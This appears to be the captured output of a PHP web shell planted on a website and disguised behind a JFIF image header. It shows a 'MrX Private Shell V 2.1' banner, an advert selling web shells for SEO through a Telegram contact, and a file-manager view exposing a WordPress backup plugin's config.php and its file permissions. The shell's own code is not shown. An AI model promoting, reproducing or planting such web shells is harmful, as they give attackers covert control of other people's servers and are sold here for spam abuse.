����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
//Paths
define('SG_PUBLIC_PATH', realpath(dirname(__FILE__).'/../').'/');
define('SG_PUBLIC_CONFIG_PATH', SG_PUBLIC_PATH.'config/');
define('SG_PUBLIC_INCLUDE_PATH', SG_PUBLIC_PATH.'include/');
define('SG_PUBLIC_MODALS_PATH', SG_PUBLIC_PATH.'include/modals/');
define('SG_PUBLIC_AJAX_PATH', SG_PUBLIC_PATH.'ajax/');
define('SG_EXTENSIONS_FOLDER_PATH', dirname(SG_PUBLIC_PATH)."/extensions/");
//Defines
define('SG_BACKUP_TYPE_FULL', 1);
define('SG_BACKUP_TYPE_CUSTOM', 2);
define('SG_BACKUP_MAX_FILE_UPLOAD_SIZE', 100); // in megabytes
@ini_set('upload_max_filesize',SG_BACKUP_MAX_FILE_UPLOAD_SIZE.'M');
@ini_set('post_max_size',SG_BACKUP_MAX_FILE_UPLOAD_SIZE.'M');
//Review popup states
define('SG_SHOW_REVIEW_POPUP', 1);
define('SG_NEVER_SHOW_REVIEW_POPUP', 2);
//Ajax frequency
define('SG_AJAX_DEFAULT_REQUEST_FREQUENCY', '2000'); //in miliseconds
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| config.php | File | 863 B | 0644 |
|
| config.wordpress.php | File | 1.29 KB | 0644 |
|